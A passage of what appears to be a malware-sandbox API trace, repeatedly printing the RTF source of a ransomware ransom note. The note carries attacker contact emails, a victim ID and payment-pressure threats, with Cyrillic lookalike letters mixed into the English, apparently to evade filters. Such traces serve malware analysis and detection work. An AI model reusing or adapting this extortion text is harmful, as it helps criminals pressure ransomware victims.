YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.541] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.541] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt 